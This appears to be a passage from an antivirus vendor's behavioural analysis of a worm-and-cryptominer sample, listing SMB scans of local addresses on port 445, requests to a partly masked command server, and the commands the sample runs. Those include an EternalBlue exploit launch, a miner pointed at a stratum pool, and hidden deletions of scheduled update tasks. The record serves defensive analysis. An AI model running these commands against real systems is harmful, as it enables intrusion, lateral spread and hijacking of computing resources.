'<LOCALNET>.2.46':445
'<LOCALNET>.2.47':445
'<LOCALNET>.2.48':445
'<LOCALNET>.2.49':445
'<LOCALNET>.2.50':445
'<LOCALNET>.2.51':445
'<LOCALNET>.2.52':445
'<LOCALNET>.2.37':445
'<LOCALNET>.2.36':445
'<LOCALNET>.2.39':445
'<LOCALNET>.1.198':445
'<LOCALNET>.2.53':445
'<LOCALNET>.2.18':445
'<LOCALNET>.2.21':445
'<LOCALNET>.2.22':445
'<LOCALNET>.2.23':445
'<LOCALNET>.2.24':445
'<LOCALNET>.2.25':445
'<LOCALNET>.2.26':445
'<LOCALNET>.2.27':445
'<LOCALNET>.2.28':445
'<LOCALNET>.2.29':445
'<LOCALNET>.2.30':445
'<LOCALNET>.2.31':445
'<LOCALNET>.2.32':445
'<LOCALNET>.2.33':445
'<LOCALNET>.2.35':445
'<LOCALNET>.2.19':445
'<LOCALNET>.2.34':445
'<LOCALNET>.2.20':445
'<LOCALNET>.2.54':445
'<LOCALNET>.2.58':445
'<LOCALNET>.2.78':445
'<LOCALNET>.2.79':445
'<LOCALNET>.2.80':445
'<LOCALNET>.2.81':445
'<LOCALNET>.2.82':445
'<LOCALNET>.2.83':445
'<LOCALNET>.2.84':445
'<LOCALNET>.2.85':445
'<LOCALNET>.2.86':445
'<LOCALNET>.2.87':445
'<LOCALNET>.2.88':445
'<LOCALNET>.2.89':445
'<LOCALNET>.2.90':445
'<LOCALNET>.2.75':445
'<LOCALNET>.2.74':445
'<LOCALNET>.2.77':445
'<LOCALNET>.2.76':445
'<LOCALNET>.2.55':445
'<LOCALNET>.2.56':445
'<LOCALNET>.2.59':445
'<LOCALNET>.2.60':445
'<LOCALNET>.2.61':445
'<LOCALNET>.2.62':445
'<LOCALNET>.2.63':445
'<LOCALNET>.2.64':445
'<LOCALNET>.2.65':445
'<LOCALNET>.2.66':445
'<LOCALNET>.2.67':445
'<LOCALNET>.2.68':445
'<LOCALNET>.2.69':445
'<LOCALNET>.2.70':445
'<LOCALNET>.2.71':445
'<LOCALNET>.2.73':445
'<LOCALNET>.2.57':445
'<LOCALNET>.2.72':445
'<LOCALNET>.3.120':445
'<LOCALNET>.3.137':445
'<LOCALNET>.2.15':445
'<LOCALNET>.1.220':445
'<LOCALNET>.1.221':445
'<LOCALNET>.1.222':445
'<LOCALNET>.1.223':445
'<LOCALNET>.1.224':445
'<LOCALNET>.1.225':445
'<LOCALNET>.1.226':445
'<LOCALNET>.1.227':445
'<LOCALNET>.1.228':445
'<LOCALNET>.1.229':445
'<LOCALNET>.1.230':445
'<LOCALNET>.1.231':445
'<LOCALNET>.1.232':445
'<LOCALNET>.1.217':445
'<LOCALNET>.1.215':445
'<LOCALNET>.1.219':445
'<LOCALNET>.2.16':445
'<LOCALNET>.1.233':445
'<LOCALNET>.1.214':445
'<LOCALNET>.1.200':445
'<LOCALNET>.1.201':445
'<LOCALNET>.1.202':445
'<LOCALNET>.1.203':445
'<LOCALNET>.1.204':445
'<LOCALNET>.1.205':445
'<LOCALNET>.1.199':445
'<LOCALNET>.1.206':445
'<LOCALNET>.1.208':445
'<LOCALNET>.1.209':445
'<LOCALNET>.1.210':445
'<LOCALNET>.1.211':445
'<LOCALNET>.1.212':445
'<LOCALNET>.1.213':445
'<LOCALNET>.1.207':445
'<LOCALNET>.1.216':445
'<LOCALNET>.2.17':445
'<LOCALNET>.1.234':445
'<LOCALNET>.1.237':445
'<LOCALNET>.2.1':445
'<LOCALNET>.2.2':445
'<LOCALNET>.2.3':445
'<LOCALNET>.2.4':445
'<LOCALNET>.2.5':445
'<LOCALNET>.2.6':445
'<LOCALNET>.2.7':445
'<LOCALNET>.2.8':445
'<LOCALNET>.2.9':445
'<LOCALNET>.2.10':445
'<LOCALNET>.2.11':445
'<LOCALNET>.2.12':445
'<LOCALNET>.2.13':445
'<LOCALNET>.2.14':445
'<LOCALNET>.1.235':445
'<LOCALNET>.2.0':445
'<LOCALNET>.1.236':445
'<LOCALNET>.1.255':445
'<LOCALNET>.1.218':445
'<LOCALNET>.1.238':445
'<LOCALNET>.1.239':445
'<LOCALNET>.1.240':445
'<LOCALNET>.1.241':445
'<LOCALNET>.1.242':445
'<LOCALNET>.1.243':445
'<LOCALNET>.1.244':445
'<LOCALNET>.1.245':445
'<LOCALNET>.1.246':445
'<LOCALNET>.1.247':445
'<LOCALNET>.1.248':445
'<LOCALNET>.1.249':445
'<LOCALNET>.1.250':445
'<LOCALNET>.1.251':445
'<LOCALNET>.1.252':445
'<LOCALNET>.1.254':445
'<LOCALNET>.3.138':445

TCP

HTTP GET requests

http://ta###ostw.com/trashgame/STATUS.html
http://ta###ostw.com/trashgame/loaderTOP.html
http://ta###ostw.com/trashgame/Login.html
http://ta###ostw.com/trashgame/Password.html
http://ta###ostw.com/trashgame/Server.html
http://ta###ostw.com/trashgame/configCPUX.html
http://ta###ostw.com/trashgame/DLL.html
http://ta###ostw.com/LTC.html
http://ta###ostw.com/BTC.html
http://ta###ostw.com/ETH.html
http://ta###ostw.com/ZEC.html
http://ta###ostw.com/DOGE.html

'19#.#2.188.155':21

'ex##mac.xyz':3333

UDP

DNS ASK ta###ostw.com
DNS ASK ex##mac.xyz

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''

Creates and executes the following

'%PROGRAMDATA%\windowstask\winlogon.exe'
'%PROGRAMDATA%\windowstask\audiodg.exe'
'%PROGRAMDATA%\rundll\system.exe' TCP 10.0.55.58/16 445 150 /save
'%PROGRAMDATA%\rundll\eternalblue-2.2.0.exe' --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2
'%PROGRAMDATA%\rundll\system.exe' TCP 192.168.1.1 445 150 /save
'%PROGRAMDATA%\rundll\rundll.exe'
'%PROGRAMDATA%\windowstask\microsofthost.exe' -o stratum+tcp://ex20mac.xyz:3333 -u CPU --donate-level=1 -k -t1
'%PROGRAMDATA%\rundll\start.exe'
'%WINDIR%\syswow64\wscript.exe' "%PROGRAMDATA%\RunDLL\start.vbs"
'%PROGRAMDATA%\windowstask\scaner.exe' -pnaxui
'%PROGRAMDATA%\windowstask\scandll.exe' -pnaxui
'<SYSTEM32>\cmd.exe' /c ipconfig /flushdns' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /query /fo list' (with hidden window)
'<SYSTEM32>\cmd.exe' /c gpupdate /force' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c Rundll.exe' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "system.exe TCP 192.168.1.1 445 150 /save"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Flash Player Updater" /F' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "system.exe TCP 10.0.55.58/16 445 150 /save"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Acrobat Update Task" /F' (with hidden window)
'%PROGRAMDATA%\windowstask\microsofthost.exe' -o stratum+tcp://ex20mac.xyz:3333 -u CPU --donate-level=1 -k -t1' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C schtasks /query /fo list
'%WINDIR%\syswow64\cmd.exe' /c "system.exe TCP 192.168.1.1 445 150 /save"
'%WINDIR%\syswow64\cmd.exe' /c Rundll.exe
'<SYSTEM32>\raserver.exe' /offerraupdate
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
'<SYSTEM32>\gpupdate.exe' /force
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
'%WINDIR%\syswow64\cmd.exe' /c "Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2"
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Adobe Flash Player Updater" /F
'<SYSTEM32>\ipconfig.exe' /flushdns
'<SYSTEM32>\cmd.exe' /c gpupdate /force
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Flash Player Updater" /F
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Acrobat Update Task" /F
'<SYSTEM32>\cmd.exe' /c ipconfig /flushdns
'%WINDIR%\syswow64\schtasks.exe' /query /fo list
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Adobe Acrobat Update Task" /F
'%WINDIR%\syswow64\cmd.exe' /c "system.exe TCP 10.0.55.58/16 445 150 /save"

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней